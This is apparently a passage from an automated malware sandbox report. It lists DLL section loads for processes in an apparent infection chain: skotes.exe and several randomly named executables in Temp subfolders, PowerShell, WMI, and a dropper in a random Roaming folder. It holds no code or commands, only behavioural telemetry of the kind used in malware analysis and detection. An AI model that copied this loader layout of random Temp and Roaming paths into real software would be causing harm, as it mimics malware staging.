                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: uxtheme.dll
